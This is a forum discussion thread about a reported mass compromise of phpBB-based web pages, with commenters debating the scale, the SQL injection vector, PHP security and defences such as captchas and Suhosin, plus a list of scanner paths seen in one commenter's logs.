Mass Website Hack Compromises 200,000 Sites

Stony Stevenson writes "Hot on the heels of a recent hack in which 10,000 sites were compromised, researchers have disclosed a new large-scale attack. Researchers at McAfee estimated that the attack has been active for roughly one week, and in that time frame has managed to place itself on roughly 200,000 web pages. Most of the infected pages are running the phpBB forum software, said McAfee. The compromised pages are embedded with a Javascript file that links to the site hosting the attack."

Pages, not sites

[Dan+East]

The title (which appears to be the only part the submitter actually "authored") is incorrect and conflicts with the text it quotes. An estimated 200,000 pages (most likely individual posts in phpBB forums) are out there, not sites.

According to this video, the pages are being inserted via SQL injection attacks. The 200k pages is based on a google search (he does not reveal what criteria he is searching for) which came back with 150k hits. So it is not clear how many actual sites are compromised. One could assume that once a phpBB site is compromised, every page of every thread, which is analogous to individual web pages, would redirect to the worm download site. A popular forum could easily have several thousand thread-pages. In fact, every single page would probably be redirecting, which would include each user's summary page (which would be in the thousands for even a small site). So a small number of cites could be accounting for all the 200k pages.

Also, in the video it is clear from the url that it is a phpBB2 site that is compromised. phpBB is currently at a major version of 3.

Re:Please be more forthcoming

For a properly maintained phpBB site, this isn't that big of a deal. As a maintainer for a site which uses phpBB, I can tell you that I have seen this attempted for months. I believe phpBB is mentioned directly because it seems there are programs which allow individuals to create forum accounts and post messages using an automated script. The scripts post messages to visit a (usually) pornographic site. Once you connect you are presented with a page with a display which mimics YouTube.com, however a pop-up is displayed saying you cannot play the video script without the proper video codec, and offers to allow you to download the codec from the site (usually codec.exe). Once you download and open the program, you are infected.

When I first started seeing this happen several months ago, I started experimenting with the security settings of the phpBB program. Enabling the captcha, and requiring administrative account activation. Since no one can create an account without my permission, this problem disappeared on my forum. This isn't practical with all forums, YMMV.

Re:Turn off computer or modem when not using

[Mortimer82]

Tell him to set up power saving correctly. Although my computer needs to stay connected to the mains for suspend to ram to work. It's to most intensive purposes "turned off". Takes 7 seconds (at most) to go to sleep and a few seconds wake up and I never have a problem.

Re:200,000 Sites Hacked

[CrossChris]

Actually, that's not quite true: my brother's website was abused like this, which resulted in Google referrals warning that "this site contains malicious software". His company ranking was Number 1 in every Google search for his type of service. It's proving very expensive for him.

Re:Internet-connection license?

[SL+Baur]

How about this plan: anybody, who wishes to maintain an Internet-reachable computer, needs to be licensed Let's just not go there, O.K.? There isn't anyone I would trust as a licensing body and when you bring in the inevitable licsensing fees ... er, let's just not go there.

Re:Please be more forthcoming

Here too, we have a threat which is already running wild. Thousands of websites are being attacked. Unfortunately, this article, like many which abound in the security theatre online media, is long on consequences and short on details. Someone knows how the attack spreads, but they aren't sharing the means of stopping the attack. We know exactly how it spreads: php. Don't get me wrong, php is a good language as of 5.x. However, to write something in it that's not simple to exploit you actually have to know what you're doing, which is not the case the for majority of php developers. Look at the majority of php code out there, it's no surprise at all why it's so security plagued: the developers simply have no clue and php doesn't protect you. Hell, even many tutorials out there have security exploits in them.

If you absolutely have to run a third party php script, do not under any circumstance run it without both the Suhosin patch and the Suhosin module. Running ModSecurity on top of that is also a good idea.

Always treat third party php code as hostile.

Re:Please be more forthcoming

[Hynee]

That's bullshit, phpBB was hit ~2-3 years ago with the self propogating worm Santy, which exploited a bug in a PHP function (unserialize IIRC). phpBB was essentially a victim--the bug was in PHP itself, and phpBB is a widely deployed open source BB, and the developers had removed all usage of the compromised function after the bug was disclosed and before the Santy worm hit. (Site owners who failed to upgrade were hit, a large percentage.)

I haven't heard of any glaring security issues with phpBB before or since, excluding the odd SEC fix. phpBB isn't vulnerable to SQL injection tricks.

Re:Good news for us, I guess...

[ncryptd]

It's the same reason hackers devote so much time exploiting Windows - more bang for your buck. phpBB is everywhere. It's not so much that as it is the fact that phpBB 1.x/2.x have a appalling number of security flaws. It's wildly insecure, so much so that there's actually a mod (crackertracker) designed to help harden installations against the inevitable attacks.

I'd be willing to bet that most of the phpBB installs were 1.x/2.x -- the phpBB team actually paid for an audit of the 3.x line, and so far it seems to be much more secure code.

Re:But most people don't know better...

[Tarwn]

Ok, what?

First, I'm not sure if your talking ASP or ASP.Net, but either way the vast majority of your comment can be shortened to:
There are lots of PHP packages out there. People think they are safe because they are not MS. PHP packages should be re-written in ASP. PHP breaks due to updates but ASP updates better, therefore ASP is a better choice. PHP isn't inherently insecure, it's the packages.

Your entire statement boils down to this logic:
1) There are a lot of insecure Packages in PHP
3) It's not an insecurity in PHP, it's an insecurity in the packages
2) ASP updates better than PHP

Your comparing apples (ASP) to oranges (PHP Packages). I have no experience how well or poorly the security of packages in PHP perform against the security of packages in ASP.Net, we would have to pick a large pool of them to find out. And just because Windows Updates makes updates available for ASP.Net does not mean that people actually are that willing to reboot their web farms for every update that appears. Your saying the problem is bad coding and that ASP solves it, I would beg to differ.

And here is my anecdotal comment:
I have answered thousands of ASP questions (ASP used to be my primary web 'language') as well as written/re-written many sites and over time I have seen a lot of site examples and snippets that would leave a page wide open or in a position to break on regular occasions (or just plain didn't work). On the other hand I have worked with several PHP packages that were solidly put together and worked against a range of PHP versions. PHP must be better because I haven't personally seen anywhere near as many errors in coding as I have in ASP. None of the first several thousand ASP posts would work at all against the next version of the language (ASP 3 => ASP.Net) and needed to be rewritten from scratch, but most or all of the packages I used with PHP 4 worked just fine with PHP 5.

yeah, I find stuff like this in my logs

[JoeCommodore]

Looking through my 404 logs I get a bunch of kiddie auto scripts either looking to BB spam or hack in, here are some items which I figure are popular entry routes:

///include/print_category.php
/forum/index.php
/bbs/include/print_category.php
/functions.php
/board/index.php
/forums/index.php
/phpbb2/index.php
//calendar//tools/send_reminders.php
//skin/zero_vote/error.php (lots of these)
/skin/zero_vote/ask_password.php
//support/mailling/maillist/inc/initdb.php (a few of these)
/function.main
/comments.php
/MSOffice/cltreq.asp
/cgi-bin/bbs/read.cgi
//include/write.php

Re:Good news for us, I guess...

[wytcld]

The problem is the phpBB developers just don't much care. I say this as someone using it for years now. Just a few months ago I found some dangerous file permissions in it, reported those, and got brushed aside with a response like "If it were an important security issue the core developers would have already taken care of it."

Fscking idiots. I still use it. But I've done extensive custom patching to make it (relatively) safe. The project maintainers just can't be bothered to listen to criticism and get smarter. Musta been born with the genius light on in their skulls.

Security hole actually in Fully Modded phpBB

[Hynee]

As reported in Secunia, the SQL injection bug was found in Fully Modded phpBB on 12-Mar, see here.

The Fully Modded phpBB website is down, but it is basically a fork or extension of the base phpBB code, which remains secure.

I know I've labored the point about phpBB not being vulnerable to this kind of attack, but it really is built from the ground up for security. This exploit does not affect phpBB, just the heavily modified for "Fully Modded phpBB".